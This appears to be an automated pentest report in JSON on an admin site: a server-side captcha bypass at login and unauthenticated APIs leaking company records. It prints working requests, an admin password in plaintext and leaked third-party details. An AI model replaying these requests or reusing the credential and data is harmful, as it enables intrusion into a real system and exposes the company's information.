{
  "report_meta": {
    "report_id": "VUL-2026-XTGQ6",
    "generated_at": "2026-05-28T02:28:04Z",
    "tester": "vibe-pentest-agent-v1",
    "scope": {
      "target_url": "https://btadmin.kjcxgl.cn/",
      "tech_stack": [
        "Nginx Vue.js Element UI"
      ]
    },
    "test_accounts": [
      {
        "role": "管理员",
        "username": "admin",
        "password": "***"
      }
    ]
  },
  "summary": {
    "total": 2,
    "critical": 0,
    "high": 1,
    "medium": 1,
    "low": 0,
    "info": 0
  },
  "vulnerabilities": [
    {
      "vuln_id": "VUL-001",
      "type": "unknown",
      "severity": "high",
      "confidence": "confirmed",
      "title": "验证码未在服务端强制校验",
      "description": "登录接口 /api/v1/user/sign-in 接受空的 graph_code 参数，验证码仅在前端校验，服务端未验证。攻击者可绕过验证码进行暴力破解。",
      "target_url": "https://btadmin.kjcxgl.cn/api/v1/user/sign-in",
      "http_interactions": [
        {
          "seq": 1,
          "label": "空验证码登录请求",
          "request": {
            "method": "POST",
            "url": "https://btadmin.kjcxgl.cn/api/v1/user/sign-in",
            "headers": {
              "Content-Type": "application/json"
            },
            "body": "{\"account\": \"admin\", \"password\": \"KJJjhc@123\", \"graph_code\": \"\", \"key\": \"eyJpdi...IiJ9\"}"
          },
          "response": {
            "status_code": 200,
            "headers": {},
            "body": "{\"data\": {\"token\": \"eyJ0eX...MhpA\", \"access_token\": \"eyJ0eX...MhpA\", \"id\": 1, \"role\": 1}, \"error_msg\": \"\", \"code\": 20000}"
          }
        }
      ],
      "type_zh": "未分类",
      "RepairSuggestions": "1. 针对该漏洞类型进行专项分析和修复；2. 参考OWASP Top 10和对应技术栈的安全最佳实践；3. 建议进行代码安全审计确认具体风险；4. 根据实际漏洞利用场景制定针对性修复方案。",
      "authenticated": false
    },
    {
      "vuln_id": "VUL-002",
      "type": "broken_access_control",
      "severity": "medium",
      "confidence": "confirmed",
      "title": "API接口未授权访问",
      "description": "以下API接口无需认证即可访问，泄露系统信息：/api/v1/user-company/graph-code, /api/v1/user-company/getStudyCompany",
      "target_url": "https://btadmin.kjcxgl.cn/",
      "http_interactions": [
        {
          "seq": 1,
          "label": "未授权API访问测试",
          "request": {
            "method": "POST",
            "url": "https://btadmin.kjcxgl.cn/api/v1/user-company/graph-code",
            "headers": {
              "Content-Type": "application/json"
            },
            "body": "{}"
          },
          "response": {
            "status_code": 200,
            "headers": {},
            "body": "{\"data\":{\"current_page\":1,\"data\":[{\"id\":6,\"user_company_id\":10,\"company_name\":\"\\u5305\\u5934\\u957f\\u5b89\\u6c38\\u78c1\\u7535\\u673a\\u6709\\u9650\\u516c\\u53f8\",\"credit_code\":\"9115029123989697XH\",\"company_type\":1,\"company_region\":11,\"detailed_address\":\"\\u5bcc\\u5f3a\\u5357\\u8def169\\u53f7\",\"company_phone\":null,\"postcode\":\"014030\",\"company_email\":\"363704802@qq.com\",\"valid_documentation_location\":\"https:\\/\\/bt.kjcxgl.cn\\/\\/api\\/v1\\/..\\/..\\/company\\/license\\/2020-05-15\\/2020-05-15-09-32-588XlHy.jpg\",\"person_n"
          }
        }
      ],
      "type_zh": "访问控制缺陷",
      "RepairSuggestions": "1. 实施最小权限原则，默认拒绝所有未明确授权的请求；2. 在API/路由层实施统一的权限校验中间件；3. 对敏感操作实施多因素认证(MFA)；4. 确保会话Cookie设置HttpOnly、Secure、SameSite标志；5. 登录后重新生成会话标识符防止会话固定攻击。",
      "authenticated": false
    }
  ]
}